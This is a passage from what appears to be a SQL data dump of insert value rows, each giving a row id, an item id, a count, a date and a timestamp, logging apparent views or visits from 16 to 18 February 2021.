00:28:23'),(13819,1774,1,'2021-02-16','2021-02-16 00:32:27'),(13820,468,1,'2021-02-16','2021-02-16 00:35:22'),(13821,481,1,'2021-02-16','2021-02-16 00:51:25'),(13822,3109,1,'2021-02-16','2021-02-16 00:52:05'),(13823,3045,1,'2021-02-16','2021-02-16 00:58:01'),(13824,3030,1,'2021-02-16','2021-02-16 01:08:47'),(13825,2801,1,'2021-02-16','2021-02-16 01:15:55'),(13826,1614,1,'2021-02-16','2021-02-16 01:30:37'),(13827,3051,1,'2021-02-16','2021-02-16 01:32:56'),(13828,3069,1,'2021-02-16','2021-02-16 01:34:36'),(13829,1586,1,'2021-02-16','2021-02-16 01:38:47'),(13830,80,1,'2021-02-16','2021-02-16 01:39:42'),(13831,1586,1,'2021-02-16','2021-02-16 01:40:36'),(13832,1604,1,'2021-02-16','2021-02-16 01:41:13'),(13833,3280,1,'2021-02-16','2021-02-16 01:42:16'),(13834,1604,1,'2021-02-16','2021-02-16 01:42:45'),(13835,3259,1,'2021-02-16','2021-02-16 01:51:39'),(13836,76,1,'2021-02-16','2021-02-16 02:01:02'),(13837,1582,1,'2021-02-16','2021-02-16 02:01:37'),(13838,2751,1,'2021-02-16','2021-02-16 02:14:16'),(13839,1718,1,'2021-02-16','2021-02-16 02:19:42'),(13840,3127,1,'2021-02-16','2021-02-16 02:35:10'),(13841,2775,1,'2021-02-16','2021-02-16 02:38:25'),(13842,1586,1,'2021-02-16','2021-02-16 03:01:50'),(13843,91,1,'2021-02-16','2021-02-16 03:02:03'),(13844,2156,1,'2021-02-16','2021-02-16 03:03:57'),(13845,91,1,'2021-02-16','2021-02-16 03:08:31'),(13846,1592,1,'2021-02-16','2021-02-16 03:10:28'),(13847,3107,1,'2021-02-16','2021-02-16 03:11:04'),(13848,2178,1,'2021-02-16','2021-02-16 03:11:06'),(13849,1594,1,'2021-02-16','2021-02-16 03:11:40'),(13850,2911,1,'2021-02-16','2021-02-16 03:23:53'),(13851,2804,1,'2021-02-16','2021-02-16 03:49:32'),(13852,1766,1,'2021-02-16','2021-02-16 04:10:38'),(13853,2769,1,'2021-02-16','2021-02-16 04:30:46'),(13854,2309,1,'2021-02-16','2021-02-16 04:35:17'),(13855,3083,1,'2021-02-16','2021-02-16 04:56:03'),(13856,3099,1,'2021-02-16','2021-02-16 04:56:19'),(13857,3083,1,'2021-02-16','2021-02-16 04:58:11'),(13858,2558,1,'2021-02-16','2021-02-16 05:11:36'),(13859,3247,1,'2021-02-16','2021-02-16 05:26:07'),(13860,3287,1,'2021-02-16','2021-02-16 05:53:30'),(13861,1586,1,'2021-02-16','2021-02-16 05:57:27'),(13862,1737,1,'2021-02-16','2021-02-16 06:06:28'),(13863,1737,1,'2021-02-16','2021-02-16 06:15:06'),(13864,1602,1,'2021-02-16','2021-02-16 06:15:08'),(13865,89,1,'2021-02-16','2021-02-16 06:19:31'),(13866,3097,1,'2021-02-16','2021-02-16 06:22:11'),(13867,2309,1,'2021-02-16','2021-02-16 06:24:43'),(13868,2420,1,'2021-02-16','2021-02-16 06:26:09'),(13869,1737,1,'2021-02-16','2021-02-16 06:28:10'),(13870,2420,1,'2021-02-16','2021-02-16 06:50:52'),(13871,1598,1,'2021-02-16','2021-02-16 06:55:00'),(13872,91,1,'2021-02-16','2021-02-16 07:00:11'),(13873,80,1,'2021-02-16','2021-02-16 07:02:03'),(13874,80,1,'2021-02-16','2021-02-16 07:03:52'),(13875,91,1,'2021-02-16','2021-02-16 07:04:30'),(13876,3087,1,'2021-02-16','2021-02-16 07:28:24'),(13877,3251,1,'2021-02-16','2021-02-16 07:28:55'),(13878,468,1,'2021-02-16','2021-02-16 07:29:50'),(13879,1766,1,'2021-02-16','2021-02-16 07:32:58'),(13880,1588,1,'2021-02-16','2021-02-16 07:44:29'),(13881,2813,1,'2021-02-16','2021-02-16 07:48:18'),(13882,477,1,'2021-02-16','2021-02-16 07:54:28'),(13883,3430,1,'2021-02-16','2021-02-16 08:16:50'),(13884,3004,1,'2021-02-16','2021-02-16 08:18:00'),(13885,1610,1,'2021-02-16','2021-02-16 08:23:34'),(13886,1612,1,'2021-02-16','2021-02-16 08:29:07'),(13887,2309,1,'2021-02-16','2021-02-16 08:41:52'),(13888,1586,1,'2021-02-16','2021-02-16 08:54:54'),(13889,2558,1,'2021-02-16','2021-02-16 08:59:58'),(13890,2809,1,'2021-02-16','2021-02-16 09:24:47'),(13891,2419,1,'2021-02-16','2021-02-16 09:25:11'),(13892,3247,1,'2021-02-16','2021-02-16 09:28:11'),(13893,91,1,'2021-02-16','2021-02-16 09:30:02'),(13894,1582,1,'2021-02-16','2021-02-16 09:31:11'),(13895,468,1,'2021-02-16','2021-02-16 09:34:56'),(13896,2159,1,'2021-02-16','2021-02-16 09:36:32'),(13897,3253,1,'2021-02-16','2021-02-16 09:42:55'),(13898,2813,1,'2021-02-16','2021-02-16 09:50:51'),(13899,76,1,'2021-02-16','2021-02-16 09:51:33'),(13900,2159,1,'2021-02-16','2021-02-16 09:52:16'),(13901,1598,1,'2021-02-16','2021-02-16 09:52:28'),(13902,3267,1,'2021-02-16','2021-02-16 10:05:53'),(13903,1870,1,'2021-02-16','2021-02-16 10:14:29'),(13904,84,1,'2021-02-16','2021-02-16 10:18:17'),(13905,72,1,'2021-02-16','2021-02-16 10:30:41'),(13906,3259,1,'2021-02-16','2021-02-16 10:32:13'),(13907,1582,1,'2021-02-16','2021-02-16 10:40:24'),(13908,3109,1,'2021-02-16','2021-02-16 10:41:56'),(13909,76,1,'2021-02-16','2021-02-16 10:56:43'),(13910,3058,1,'2021-02-16','2021-02-16 11:08:13'),(13911,1711,1,'2021-02-16','2021-02-16 11:12:45'),(13912,2159,1,'2021-02-16','2021-02-16 11:14:20'),(13913,2159,1,'2021-02-16','2021-02-16 11:14:33'),(13914,2159,1,'2021-02-16','2021-02-16 11:15:43'),(13915,2159,1,'2021-02-16','2021-02-16 11:16:47'),(13916,3027,1,'2021-02-16','2021-02-16 11:23:57'),(13917,1586,1,'2021-02-16','2021-02-16 11:24:29'),(13918,1602,1,'2021-02-16','2021-02-16 11:25:45'),(13919,1774,1,'2021-02-16','2021-02-16 11:27:34'),(13920,68,1,'2021-02-16','2021-02-16 11:33:06'),(13921,1612,1,'2021-02-16','2021-02-16 11:35:35'),(13922,470,1,'2021-02-16','2021-02-16 11:36:10'),(13923,80,1,'2021-02-16','2021-02-16 11:38:19'),(13924,1602,1,'2021-02-16','2021-02-16 11:39:59'),(13925,1718,1,'2021-02-16','2021-02-16 11:40:54'),(13926,3486,1,'2021-02-16','2021-02-16 11:42:52'),(13927,108,1,'2021-02-16','2021-02-16 11:44:42'),(13928,1586,1,'2021-02-16','2021-02-16 11:45:25'),(13929,1608,1,'2021-02-16','2021-02-16 11:48:00'),(13930,3027,1,'2021-02-16','2021-02-16 11:48:24'),(13931,3282,1,'2021-02-16','2021-02-16 11:49:01'),(13932,1586,1,'2021-02-16','2021-02-16 11:50:16'),(13933,2813,1,'2021-02-16','2021-02-16 11:50:19'),(13934,1586,1,'2021-02-16','2021-02-16 11:52:54'),(13935,87,1,'2021-02-16','2021-02-16 11:52:55'),(13936,1713,1,'2021-02-16','2021-02-16 11:53:06'),(13937,68,1,'2021-02-16','2021-02-16 11:54:13'),(13938,3053,1,'2021-02-16','2021-02-16 11:54:57'),(13939,1588,1,'2021-02-16','2021-02-16 12:01:16'),(13940,1588,1,'2021-02-16','2021-02-16 12:01:18'),(13941,89,1,'2021-02-16','2021-02-16 12:03:26'),(13942,2297,1,'2021-02-16','2021-02-16 12:05:57'),(13943,91,1,'2021-02-16','2021-02-16 12:11:47'),(13944,2775,1,'2021-02-16','2021-02-16 12:13:37'),(13945,474,1,'2021-02-16','2021-02-16 12:18:42'),(13946,474,1,'2021-02-16','2021-02-16 12:19:20'),(13947,76,1,'2021-02-16','2021-02-16 12:19:39'),(13948,76,1,'2021-02-16','2021-02-16 12:20:25'),(13949,68,1,'2021-02-16','2021-02-16 12:20:40'),(13950,76,1,'2021-02-16','2021-02-16 12:23:41'),(13951,76,1,'2021-02-16','2021-02-16 12:24:00'),(13952,474,1,'2021-02-16','2021-02-16 12:25:12'),(13953,570,1,'2021-02-16','2021-02-16 12:25:30'),(13954,2178,1,'2021-02-16','2021-02-16 12:42:19'),(13955,3107,1,'2021-02-16','2021-02-16 12:50:52'),(13956,3280,1,'2021-02-16','2021-02-16 12:52:50'),(13957,3275,1,'2021-02-16','2021-02-16 13:00:14'),(13958,1606,1,'2021-02-16','2021-02-16 13:11:38'),(13959,1614,1,'2021-02-16','2021-02-16 13:14:26'),(13960,89,1,'2021-02-16','2021-02-16 13:23:36'),(13961,1614,1,'2021-02-16','2021-02-16 13:25:02'),(13962,2419,1,'2021-02-16','2021-02-16 13:28:14'),(13963,335,1,'2021-02-16','2021-02-16 13:29:05'),(13964,476,1,'2021-02-16','2021-02-16 13:33:06'),(13965,2617,1,'2021-02-16','2021-02-16 14:07:31'),(13966,1586,1,'2021-02-16','2021-02-16 14:10:22'),(13967,3087,1,'2021-02-16','2021-02-16 14:26:31'),(13968,3285,1,'2021-02-16','2021-02-16 14:29:33'),(13969,1544,1,'2021-02-16','2021-02-16 14:43:04'),(13970,1588,1,'2021-02-16','2021-02-16 14:46:53'),(13971,3278,1,'2021-02-16','2021-02-16 14:48:04'),(13972,1701,1,'2021-02-16','2021-02-16 14:51:35'),(13973,2296,1,'2021-02-16','2021-02-16 15:01:47'),(13974,1604,1,'2021-02-16','2021-02-16 15:15:45'),(13975,3051,1,'2021-02-16','2021-02-16 15:20:28'),(13976,2964,1,'2021-02-16','2021-02-16 15:25:10'),(13977,1598,1,'2021-02-16','2021-02-16 15:29:16'),(13978,3083,1,'2021-02-16','2021-02-16 15:29:52'),(13979,3127,1,'2021-02-16','2021-02-16 15:33:03'),(13980,3109,1,'2021-02-16','2021-02-16 15:39:11'),(13981,570,1,'2021-02-16','2021-02-16 15:43:52'),(13982,3045,1,'2021-02-16','2021-02-16 15:47:05'),(13983,2558,1,'2021-02-16','2021-02-16 16:07:17'),(13984,477,1,'2021-02-16','2021-02-16 16:10:38'),(13985,1604,1,'2021-02-16','2021-02-16 16:28:30'),(13986,3005,1,'2021-02-16','2021-02-16 16:28:42'),(13987,74,1,'2021-02-16','2021-02-16 16:54:52'),(13988,1614,1,'2021-02-16','2021-02-16 17:02:51'),(13989,1614,1,'2021-02-16','2021-02-16 17:03:43'),(13990,1614,1,'2021-02-16','2021-02-16 17:04:05'),(13991,3096,1,'2021-02-16','2021-02-16 17:06:26'),(13992,478,1,'2021-02-16','2021-02-16 17:12:41'),(13993,2609,1,'2021-02-16','2021-02-16 17:17:24'),(13994,1600,1,'2021-02-16','2021-02-16 17:22:49'),(13995,1602,1,'2021-02-16','2021-02-16 17:26:46'),(13996,1602,1,'2021-02-16','2021-02-16 17:31:29'),(13997,1705,1,'2021-02-16','2021-02-16 17:36:49'),(13998,3278,1,'2021-02-16','2021-02-16 17:45:27'),(13999,1724,1,'2021-02-16','2021-02-16 17:54:49'),(14000,473,1,'2021-02-16','2021-02-16 17:56:48'),(14001,1608,1,'2021-02-16','2021-02-16 18:01:06'),(14002,2063,1,'2021-02-16','2021-02-16 18:09:14'),(14003,3045,1,'2021-02-16','2021-02-16 18:32:07'),(14004,1596,1,'2021-02-16','2021-02-16 18:32:10'),(14005,1592,1,'2021-02-16','2021-02-16 18:36:54'),(14006,3287,1,'2021-02-16','2021-02-16 18:46:11'),(14007,2775,1,'2021-02-16','2021-02-16 18:55:42'),(14008,3104,1,'2021-02-16','2021-02-16 18:56:48'),(14009,1749,1,'2021-02-16','2021-02-16 19:04:55'),(14010,1600,1,'2021-02-16','2021-02-16 19:10:58'),(14011,1745,1,'2021-02-16','2021-02-16 19:20:43'),(14012,1596,1,'2021-02-16','2021-02-16 19:34:47'),(14013,2395,1,'2021-02-16','2021-02-16 19:37:38'),(14014,2769,1,'2021-02-16','2021-02-16 19:42:13'),(14015,2769,1,'2021-02-16','2021-02-16 19:42:24'),(14016,2775,1,'2021-02-16','2021-02-16 19:43:27'),(14017,2769,1,'2021-02-16','2021-02-16 19:45:34'),(14018,3058,1,'2021-02-16','2021-02-16 19:47:01'),(14019,2809,1,'2021-02-16','2021-02-16 19:50:16'),(14020,3275,1,'2021-02-16','2021-02-16 19:56:33'),(14021,3107,1,'2021-02-16','2021-02-16 19:58:26'),(14022,1737,1,'2021-02-16','2021-02-16 20:05:51'),(14023,1606,1,'2021-02-16','2021-02-16 20:10:20'),(14024,3034,1,'2021-02-16','2021-02-16 20:28:24'),(14025,3181,1,'2021-02-16','2021-02-16 20:43:07'),(14026,473,1,'2021-02-16','2021-02-16 20:44:34'),(14027,473,1,'2021-02-16','2021-02-16 20:46:02'),(14028,3180,1,'2021-02-16','2021-02-16 20:52:25'),(14029,2411,1,'2021-02-16','2021-02-16 21:01:47'),(14030,486,1,'2021-02-16','2021-02-16 21:15:49'),(14031,1614,1,'2021-02-16','2021-02-16 21:22:25'),(14032,2989,1,'2021-02-16','2021-02-16 21:31:57'),(14033,1594,1,'2021-02-16','2021-02-16 21:35:38'),(14034,3271,1,'2021-02-16','2021-02-16 21:39:20'),(14035,2309,1,'2021-02-16','2021-02-16 21:43:52'),(14036,1600,1,'2021-02-16','2021-02-16 22:02:36'),(14037,2934,1,'2021-02-16','2021-02-16 22:15:45'),(14038,2751,1,'2021-02-16','2021-02-16 22:16:39'),(14039,2309,1,'2021-02-16','2021-02-16 22:25:54'),(14040,3034,1,'2021-02-16','2021-02-16 22:31:52'),(14041,1711,1,'2021-02-16','2021-02-16 22:33:16'),(14042,1610,1,'2021-02-16','2021-02-16 22:44:40'),(14043,477,1,'2021-02-16','2021-02-16 22:49:19'),(14044,2309,1,'2021-02-16','2021-02-16 22:53:50'),(14045,3249,1,'2021-02-16','2021-02-16 22:59:54'),(14046,3175,1,'2021-02-16','2021-02-16 23:03:25'),(14047,1586,1,'2021-02-16','2021-02-16 23:03:56'),(14048,3287,1,'2021-02-16','2021-02-16 23:17:29'),(14049,1586,1,'2021-02-16','2021-02-16 23:20:55'),(14050,1600,1,'2021-02-16','2021-02-16 23:39:35'),(14051,1600,1,'2021-02-16','2021-02-16 23:39:53'),(14052,1600,1,'2021-02-16','2021-02-16 23:40:24'),(14053,3027,1,'2021-02-16','2021-02-16 23:48:47'),(14054,3259,1,'2021-02-16','2021-02-16 23:50:52'),(14055,1584,1,'2021-02-16','2021-02-16 23:54:47'),(14056,2490,1,'2021-02-17','2021-02-17 00:04:09'),(14057,1594,1,'2021-02-17','2021-02-17 00:12:12'),(14058,484,1,'2021-02-17','2021-02-17 00:22:48'),(14059,3243,1,'2021-02-17','2021-02-17 00:36:54'),(14060,3124,1,'2021-02-17','2021-02-17 00:38:35'),(14061,1772,1,'2021-02-17','2021-02-17 00:54:54'),(14062,468,1,'2021-02-17','2021-02-17 01:14:16'),(14063,1730,1,'2021-02-17','2021-02-17 01:23:38'),(14064,76,1,'2021-02-17','2021-02-17 01:27:38'),(14065,3004,1,'2021-02-17','2021-02-17 01:37:38'),(14066,3257,1,'2021-02-17','2021-02-17 01:42:16'),(14067,1606,1,'2021-02-17','2021-02-17 01:46:59'),(14068,1586,1,'2021-02-17','2021-02-17 01:56:20'),(14069,2769,1,'2021-02-17','2021-02-17 02:01:07'),(14070,1604,1,'2021-02-17','2021-02-17 02:15:00'),(14071,3034,1,'2021-02-17','2021-02-17 02:16:53'),(14072,1604,1,'2021-02-17','2021-02-17 02:24:22'),(14073,3257,1,'2021-02-17','2021-02-17 02:33:46'),(14074,1614,1,'2021-02-17','2021-02-17 02:34:36'),(14075,80,1,'2021-02-17','2021-02-17 02:35:46'),(14076,108,1,'2021-02-17','2021-02-17 02:38:23'),(14077,2420,1,'2021-02-17','2021-02-17 02:47:46'),(14078,3045,1,'2021-02-17','2021-02-17 02:59:31'),(14079,1588,1,'2021-02-17','2021-02-17 03:01:47'),(14080,3285,1,'2021-02-17','2021-02-17 03:17:47'),(14081,477,1,'2021-02-17','2021-02-17 03:32:00'),(14082,3259,1,'2021-02-17','2021-02-17 03:45:29'),(14083,3096,1,'2021-02-17','2021-02-17 03:46:09'),(14084,471,1,'2021-02-17','2021-02-17 03:57:54'),(14085,2410,1,'2021-02-17','2021-02-17 04:07:13'),(14086,3226,1,'2021-02-17','2021-02-17 04:11:55'),(14087,1713,1,'2021-02-17','2021-02-17 04:21:15'),(14088,2165,1,'2021-02-17','2021-02-17 04:25:56'),(14089,3023,1,'2021-02-17','2021-02-17 04:29:48'),(14090,3102,1,'2021-02-17','2021-02-17 04:39:21'),(14091,471,1,'2021-02-17','2021-02-17 04:49:20'),(14092,3005,1,'2021-02-17','2021-02-17 04:54:09'),(14093,2156,1,'2021-02-17','2021-02-17 05:00:41'),(14094,1614,1,'2021-02-17','2021-02-17 05:02:00'),(14095,106,1,'2021-02-17','2021-02-17 05:03:20'),(14096,3058,1,'2021-02-17','2021-02-17 05:12:42'),(14097,469,1,'2021-02-17','2021-02-17 05:17:22'),(14098,3030,1,'2021-02-17','2021-02-17 05:25:24'),(14099,2609,1,'2021-02-17','2021-02-17 05:26:43'),(14100,1743,1,'2021-02-17','2021-02-17 05:31:27'),(14101,3278,1,'2021-02-17','2021-02-17 05:40:44'),(14102,2989,1,'2021-02-17','2021-02-17 05:50:07'),(14103,2934,1,'2021-02-17','2021-02-17 05:51:28'),(14104,1778,1,'2021-02-17','2021-02-17 05:52:34'),(14105,3053,1,'2021-02-17','2021-02-17 05:57:51'),(14106,3063,1,'2021-02-17','2021-02-17 06:08:11'),(14107,87,1,'2021-02-17','2021-02-17 06:08:52'),(14108,2813,1,'2021-02-17','2021-02-17 06:12:43'),(14109,1722,1,'2021-02-17','2021-02-17 06:18:11'),(14110,1701,1,'2021-02-17','2021-02-17 06:27:29'),(14111,1596,1,'2021-02-17','2021-02-17 06:32:10'),(14112,2769,1,'2021-02-17','2021-02-17 06:40:59'),(14113,2148,1,'2021-02-17','2021-02-17 06:41:30'),(14114,1600,1,'2021-02-17','2021-02-17 06:50:26'),(14115,3290,1,'2021-02-17','2021-02-17 06:52:01'),(14116,1778,1,'2021-02-17','2021-02-17 06:52:21'),(14117,1782,1,'2021-02-17','2021-02-17 06:55:32'),(14118,2617,1,'2021-02-17','2021-02-17 06:57:30'),(14119,481,1,'2021-02-17','2021-02-17 07:09:35'),(14120,3297,1,'2021-02-17','2021-02-17 07:32:14'),(14121,1877,1,'2021-02-17','2021-02-17 07:32:58'),(14122,91,1,'2021-02-17','2021-02-17 07:37:38'),(14123,1734,1,'2021-02-17','2021-02-17 07:42:17'),(14124,1776,1,'2021-02-17','2021-02-17 07:52:28'),(14125,3263,1,'2021-02-17','2021-02-17 08:10:20'),(14126,91,1,'2021-02-17','2021-02-17 08:21:13'),(14127,2965,1,'2021-02-17','2021-02-17 08:21:57'),(14128,91,1,'2021-02-17','2021-02-17 08:26:47'),(14129,91,1,'2021-02-17','2021-02-17 08:28:19'),(14130,91,1,'2021-02-17','2021-02-17 08:34:16'),(14131,3253,1,'2021-02-17','2021-02-17 08:35:31'),(14132,2934,1,'2021-02-17','2021-02-17 08:38:24'),(14133,2297,1,'2021-02-17','2021-02-17 08:39:24'),(14134,3060,1,'2021-02-17','2021-02-17 08:51:14'),(14135,1780,1,'2021-02-17','2021-02-17 08:52:25'),(14136,2557,1,'2021-02-17','2021-02-17 09:01:54'),(14137,3180,1,'2021-02-17','2021-02-17 09:06:28'),(14138,2658,1,'2021-02-17','2021-02-17 09:23:09'),(14139,1586,1,'2021-02-17','2021-02-17 09:38:26'),(14140,108,1,'2021-02-17','2021-02-17 09:39:12'),(14141,2751,1,'2021-02-17','2021-02-17 09:43:52'),(14142,3245,1,'2021-02-17','2021-02-17 10:07:14'),(14143,1586,1,'2021-02-17','2021-02-17 10:10:27'),(14144,1713,1,'2021-02-17','2021-02-17 10:10:50'),(14145,91,1,'2021-02-17','2021-02-17 10:21:15'),(14146,1713,1,'2021-02-17','2021-02-17 10:23:45'),(14147,3127,1,'2021-02-17','2021-02-17 10:34:52'),(14148,1737,1,'2021-02-17','2021-02-17 10:35:17'),(14149,1588,1,'2021-02-17','2021-02-17 10:37:34'),(14150,1776,1,'2021-02-17','2021-02-17 10:52:20'),(14151,2410,1,'2021-02-17','2021-02-17 11:05:02'),(14152,3030,1,'2021-02-17','2021-02-17 11:11:40'),(14153,2309,1,'2021-02-17','2021-02-17 11:16:30'),(14154,3107,1,'2021-02-17','2021-02-17 11:20:02'),(14155,3104,1,'2021-02-17','2021-02-17 11:21:13'),(14156,80,1,'2021-02-17','2021-02-17 11:26:56'),(14157,2769,1,'2021-02-17','2021-02-17 11:38:22'),(14158,2159,1,'2021-02-17','2021-02-17 11:45:25'),(14159,1594,1,'2021-02-17','2021-02-17 11:51:01'),(14160,87,1,'2021-02-17','2021-02-17 11:53:00'),(14161,3498,1,'2021-02-17','2021-02-17 12:04:27'),(14162,3498,1,'2021-02-17','2021-02-17 12:12:23'),(14163,3498,1,'2021-02-17','2021-02-17 12:12:33'),(14164,3498,1,'2021-02-17','2021-02-17 12:13:01'),(14165,1582,1,'2021-02-17','2021-02-17 12:16:48'),(14166,1711,1,'2021-02-17','2021-02-17 12:18:10'),(14167,3275,1,'2021-02-17','2021-02-17 12:27:29'),(14168,2934,1,'2021-02-17','2021-02-17 12:32:11'),(14169,91,1,'2021-02-17','2021-02-17 12:33:34'),(14170,1600,1,'2021-02-17','2021-02-17 12:34:50'),(14171,91,1,'2021-02-17','2021-02-17 12:39:39'),(14172,68,1,'2021-02-17','2021-02-17 12:42:46'),(14173,91,1,'2021-02-17','2021-02-17 12:44:08'),(14174,2309,1,'2021-02-17','2021-02-17 12:47:30'),(14175,2309,1,'2021-02-17','2021-02-17 12:47:37'),(14176,2309,1,'2021-02-17','2021-02-17 12:48:14'),(14177,1770,1,'2021-02-17','2021-02-17 13:00:20'),(14178,3175,1,'2021-02-17','2021-02-17 13:14:14'),(14179,3316,1,'2021-02-17','2021-02-17 13:32:43'),(14180,473,1,'2021-02-17','2021-02-17 13:42:17'),(14181,1594,1,'2021-02-17','2021-02-17 13:51:40'),(14182,1610,1,'2021-02-17','2021-02-17 14:01:01'),(14183,1592,1,'2021-02-17','2021-02-17 14:10:21'),(14184,477,1,'2021-02-17','2021-02-17 14:14:04'),(14185,3027,1,'2021-02-17','2021-02-17 14:26:20'),(14186,3104,1,'2021-02-17','2021-02-17 14:42:03'),(14187,2152,1,'2021-02-17','2021-02-17 14:43:06'),(14188,3034,1,'2021-02-17','2021-02-17 14:45:58'),(14189,1728,1,'2021-02-17','2021-02-17 14:52:25'),(14190,2159,1,'2021-02-17','2021-02-17 15:04:44'),(14191,2490,1,'2021-02-17','2021-02-17 15:11:08'),(14192,2150,1,'2021-02-17','2021-02-17 15:22:52'),(14193,1586,1,'2021-02-17','2021-02-17 15:27:05'),(14194,472,1,'2021-02-17','2021-02-17 15:34:34'),(14195,3107,1,'2021-02-17','2021-02-17 15:35:29'),(14196,2775,1,'2021-02-17','2021-02-17 15:38:15'),(14197,2964,1,'2021-02-17','2021-02-17 15:39:17'),(14198,1586,1,'2021-02-17','2021-02-17 15:41:08'),(14199,1588,1,'2021-02-17','2021-02-17 15:44:39'),(14200,1614,1,'2021-02-17','2021-02-17 15:45:27'),(14201,1614,1,'2021-02-17','2021-02-17 15:46:51'),(14202,3229,1,'2021-02-17','2021-02-17 15:47:17'),(14203,1614,1,'2021-02-17','2021-02-17 15:47:34'),(14204,3278,1,'2021-02-17','2021-02-17 15:47:47'),(14205,1614,1,'2021-02-17','2021-02-17 15:50:51'),(14206,1614,1,'2021-02-17','2021-02-17 15:50:57'),(14207,2809,1,'2021-02-17','2021-02-17 15:52:03'),(14208,1697,1,'2021-02-17','2021-02-17 15:55:51'),(14209,1614,1,'2021-02-17','2021-02-17 15:58:48'),(14210,3479,1,'2021-02-17','2021-02-17 16:07:35'),(14211,3479,1,'2021-02-17','2021-02-17 16:08:22'),(14212,3104,1,'2021-02-17','2021-02-17 16:40:23'),(14213,2956,1,'2021-02-17','2021-02-17 16:41:28'),(14214,3083,1,'2021-02-17','2021-02-17 16:53:33'),(14215,3096,1,'2021-02-17','2021-02-17 17:05:45'),(14216,2165,1,'2021-02-17','2021-02-17 17:15:14'),(14217,3083,1,'2021-02-17','2021-02-17 17:17:38'),(14218,1701,1,'2021-02-17','2021-02-17 17:20:12'),(14219,486,1,'2021-02-17','2021-02-17 17:25:41'),(14220,1741,1,'2021-02-17','2021-02-17 17:27:42'),(14221,1614,1,'2021-02-17','2021-02-17 17:29:08'),(14222,1586,1,'2021-02-17','2021-02-17 17:31:15'),(14223,3257,1,'2021-02-17','2021-02-17 17:31:34'),(14224,1614,1,'2021-02-17','2021-02-17 17:33:34'),(14225,108,1,'2021-02-17','2021-02-17 17:34:02'),(14226,3178,1,'2021-02-17','2021-02-17 17:48:18'),(14227,3178,1,'2021-02-17','2021-02-17 17:50:35'),(14228,2503,1,'2021-02-17','2021-02-17 17:51:10'),(14229,570,1,'2021-02-17','2021-02-17 17:51:23'),(14230,1741,1,'2021-02-17','2021-02-17 17:51:51'),(14231,570,1,'2021-02-17','2021-02-17 17:52:31'),(14232,3278,1,'2021-02-17','2021-02-17 17:53:16'),(14233,1734,1,'2021-02-17','2021-02-17 17:59:36'),(14234,2558,1,'2021-02-17','2021-02-17 18:04:15'),(14235,2309,1,'2021-02-17','2021-02-17 18:07:04'),(14236,3257,1,'2021-02-17','2021-02-17 18:08:53'),(14237,1732,1,'2021-02-17','2021-02-17 18:13:30'),(14238,3285,1,'2021-02-17','2021-02-17 18:38:29'),(14239,3269,1,'2021-02-17','2021-02-17 18:46:13'),(14240,3096,1,'2021-02-17','2021-02-17 19:04:55'),(14241,1602,1,'2021-02-17','2021-02-17 19:54:58'),(14242,1602,1,'2021-02-17','2021-02-17 19:57:23'),(14243,1602,1,'2021-02-17','2021-02-17 20:02:31'),(14244,1596,1,'2021-02-17','2021-02-17 20:15:02'),(14245,2503,1,'2021-02-17','2021-02-17 20:19:48'),(14246,2989,1,'2021-02-17','2021-02-17 20:24:23'),(14247,483,1,'2021-02-17','2021-02-17 20:34:43'),(14248,1722,1,'2021-02-17','2021-02-17 21:01:46'),(14249,108,1,'2021-02-17','2021-02-17 21:08:33'),(14250,2148,1,'2021-02-17','2021-02-17 21:11:09'),(14251,1707,1,'2021-02-17','2021-02-17 21:15:49'),(14252,1743,1,'2021-02-17','2021-02-17 21:20:53'),(14253,1724,1,'2021-02-17','2021-02-17 21:29:49'),(14254,1745,1,'2021-02-17','2021-02-17 21:39:14'),(14255,1782,1,'2021-02-17','2021-02-17 21:43:55'),(14256,485,1,'2021-02-17','2021-02-17 21:48:32'),(14257,2934,1,'2021-02-17','2021-02-17 22:02:56'),(14258,1600,1,'2021-02-17','2021-02-17 22:16:36'),(14259,1602,1,'2021-02-17','2021-02-17 22:21:16'),(14260,1705,1,'2021-02-17','2021-02-17 22:35:18'),(14261,2769,1,'2021-02-17','2021-02-17 22:39:59'),(14262,2309,1,'2021-02-17','2021-02-17 22:44:38'),(14263,1588,1,'2021-02-17','2021-02-17 22:49:22'),(14264,1600,1,'2021-02-17','2021-02-17 23:12:41'),(14265,1749,1,'2021-02-17','2021-02-17 23:23:49'),(14266,1749,1,'2021-02-17','2021-02-17 23:24:42'),(14267,3178,1,'2021-02-17','2021-02-17 23:40:43'),(14268,1586,1,'2021-02-17','2021-02-17 23:45:26'),(14269,3181,1,'2021-02-17','2021-02-17 23:54:46'),(14270,1544,1,'2021-02-18','2021-02-18 00:50:53'),(14271,1606,1,'2021-02-18','2021-02-18 01:02:28'),(14272,3253,1,'2021-02-18','2021-02-18 01:03:46'),(14273,2993,1,'2021-02-18','2021-02-18 01:18:49'),(14274,68,1,'2021-02-18','2021-02-18 01:23:38'),(14275,1703,1,'2021-02-18','2021-02-18 01:25:23'),(14276,2904,1,'2021-02-18','2021-02-18 01:35:41'),(14277,2410,1,'2021-02-18','2021-02-18 01:42:20'),(14278,3072,1,'2021-02-18','2021-02-18 01:51:43'),(14279,1730,1,'2021-02-18','2021-02-18 01:53:42'),(14280,3005,1,'2021-02-18','2021-02-18 02:10:22'),(14281,1703,1,'2021-02-18','2021-02-18 02:19:41'),(14282,3053,1,'2021-02-18','2021-02-18 02:58:54'),(14283,3053,1,'2021-02-18','2021-02-18 03:00:42'),(14284,1612,1,'2021-02-18','2021-02-18 03:16:54'),(14285,468,1,'2021-02-18','2021-02-18 03:31:10'),(14286,3287,1,'2021-02-18','2021-02-18 03:34:50'),(14287,3127,1,'2021-02-18','2021-02-18 03:51:51'),(14288,3127,1,'2021-02-18','2021-02-18 03:53:13'),(14289,2558,1,'2021-02-18','2021-02-18 04:05:22'),(14290,1709,1,'2021-02-18','2021-02-18 04:07:14'),(14291,2956,1,'2021-02-18','2021-02-18 04:17:21'),(14292,1870,1,'2021-02-18','2021-02-18 04:42:30'),(14293,1699,1,'2021-02-18','2021-02-18 04:42:31'),(14294,3079,1,'2021-02-18','2021-02-18 04:48:20'),(14295,2252,1,'2021-02-18','2021-02-18 05:03:13'),(14296,2490,1,'2021-02-18','2021-02-18 05:32:36'),(14297,2911,1,'2021-02-18','2021-02-18 05:42:37'),(14298,2751,1,'2021-02-18','2021-02-18 06:42:58'),(14299,2751,1,'2021-02-18','2021-02-18 06:53:25'),(14300,3005,1,'2021-02-18','2021-02-18 07:08:52'),(14301,1602,1,'2021-02-18','2021-02-18 07:29:05'),(14302,80,1,'2021-02-18','2021-02-18 07:35:34'),(14303,84,1,'2021-02-18','2021-02-18 07:45:32'),(14304,2609,1,'2021-02-18','2021-02-18 